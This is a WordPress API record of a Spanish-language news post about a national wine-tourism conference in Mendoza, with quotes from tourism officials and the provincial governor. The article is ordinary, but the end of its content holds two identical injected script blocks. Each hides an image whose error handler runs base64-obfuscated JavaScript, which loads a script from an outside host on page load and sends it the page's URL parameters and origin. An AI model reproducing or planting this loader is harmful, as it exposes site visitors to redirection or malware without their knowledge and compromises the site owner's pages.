{"id":4535,"date":"2024-11-04T10:50:53","date_gmt":"2024-11-04T13:50:53","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4535"},"modified":"2025-08-13T23:46:32","modified_gmt":"2025-08-14T02:46:32","slug":"iv-jornadas-nacionales-de-turismo-del-vino-en-la-ciudad-de-mendoza","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4535","title":{"rendered":"IV Jornadas Nacionales de Turismo del Vino en la ciudad de Mendoza"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><em>La subsecretaria de Turismo de la Naci\u00f3n, Yanina Mart\u00ednez, particip\u00f3 de la nueva edici\u00f3n de las Jornadas en el panel \u201cGobernanza y enoturismo: la construcci\u00f3n de pol\u00edticas p\u00fablicas para la gesti\u00f3n del turismo del vino\u201d.<\/em><\/h3>\n\n\n\n<p>La cuarta edici\u00f3n de las&nbsp;<strong>Jornadas Nacionales de Turismo del Vino<\/strong>&nbsp;se llev\u00f3 a cabo en Mendoza capital, organizada por la Secretar\u00eda de Turismo, Ambiente y Deportes de la Naci\u00f3n, la provincia de Mendoza, y la Corporaci\u00f3n Vitivin\u00edcola Argentina (Coviar).<\/p>\n\n\n\n<p>El encuentro tiene como objetivo construir un espacio de di\u00e1logo, intercambio, capacitaci\u00f3n y formaci\u00f3n destinado a impulsar el desarrollo del sector tur\u00edstico, la gastronom\u00eda y su relaci\u00f3n con la&nbsp;<strong>producci\u00f3n vitivin\u00edcola en Argentina<\/strong>.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvieron presentes el gobernador de Mendoza,&nbsp;<strong>Alfredo Cornejo<\/strong>; el vicepresidente de Coviar,&nbsp;<strong>Pablo Assens<\/strong>&nbsp;y la presidenta del Ente Mendoza de Turismo,&nbsp;<strong>Gabriela Testa<\/strong>.<\/p>\n\n\n\n<p>La subsecretaria de Turismo de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, particip\u00f3 del panel \u201cGobernanza y enoturismo: la construcci\u00f3n de pol\u00edticas p\u00fablicas para la gesti\u00f3n del turismo del vino\u201d en el que asegur\u00f3: \u201c<em>Es momento de trabajar pensando de manera global, insert\u00e1ndonos en el mercado, brindando certeza y confianza a partir del orden macroecon\u00f3mico. Mendoza brinda seguridad para los turistas y los inversores, que es lo que m\u00e1s buscan a la hora de elegir un destino<\/em>\u201d.<\/p>\n\n\n\n<p>\u201c<em>19 provincias del pa\u00eds son productoras vitivin\u00edcolas y 16 tienen bodegas abiertas al enoturismo. Esta actividad da un valor agregado a las econom\u00edas regionales y a los sectores complementarios que acompa\u00f1an a este circuito virtuoso, es clave involucrar a toda la comunidad de ac\u00e1 en adelante<\/em>\u201d, finaliz\u00f3.<\/p>\n\n\n\n<p><strong>Cornejo<\/strong>&nbsp;manifest\u00f3 que \u201c<em>el vino est\u00e1 involucrado en la mayor\u00eda de los sectores econ\u00f3micos de la provincia y se relaciona con casi todas las actividades del producto bruto geogr\u00e1fico<\/em>\u201d.<\/p>\n\n\n\n<p>\u201c<em>Mendoza recibi\u00f3 3.800.000 turistas en el a\u00f1o 2023. Super\u00f3 a la poblaci\u00f3n de toda la provincia. Nos hemos transformado en un destino tur\u00edstico relevante para el pa\u00eds y para ayudar a la Marca Pa\u00eds<\/em>\u201d, complet\u00f3 el Gobernador.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/iv_jornadas_mdz_vino.jpg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por su parte, Pablo Assens afirm\u00f3 que \u201c<em>la Corporaci\u00f3n incorpor\u00f3 como uno de sus ejes estrat\u00e9gicos al turismo del vino, con el objetivo de que los turistas se interioricen y conozcan algo tan nuestro como el vino argentino<\/em>\u201d.<\/p>\n\n\n\n<p>Entre los contenidos de las Jornadas, uno de los paneles destac\u00f3 la importancia de los datos del turismo del vino, fundamentales al momento de la toma de decisiones. En el mismo se ponder\u00f3 el rol del Observatorio de Turismo del Vino de Mendoza, el cual recopila toda la informaci\u00f3n provincial del segmento.<\/p>\n\n\n\n<p>Adem\u00e1s, se trataron tem\u00e1ticas vinculadas al turismo y la sostenibilidad, y lo relevante que resulta poder implementar herramientas para este fin. Tambi\u00e9n se realiz\u00f3 una exposici\u00f3n sobre maridaje en la que se relataron experiencias&nbsp;de&nbsp;enoturismo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/iv-jornadas-nacionales-de-turismo-del-vino-en-la-ciudad-de-mendoza\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:272px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La subsecretaria de Turismo de la Naci\u00f3n, Yanina Mart\u00ednez, particip\u00f3 de la nueva edici\u00f3n de las Jornadas en el panel \u201cGobernanza y enoturismo: la construcci\u00f3n de pol\u00edticas p\u00fablicas para la gesti\u00f3n del turismo del vino\u201d. La cuarta edici\u00f3n de las&nbsp;Jornadas Nacionales de Turismo del Vino&nbsp;se llev\u00f3 a cabo en Mendoza capital, organizada por la Secretar\u00eda [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4536,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[24,21],"tags":[],"class_list":{"0":"post-4535","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-bodegas","8":"category-nacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4535"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4535"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4535\/revisions"}],"predecessor-version":[{"id":6652,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4535\/revisions\/6652"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4536"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4535"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4535"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4535"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}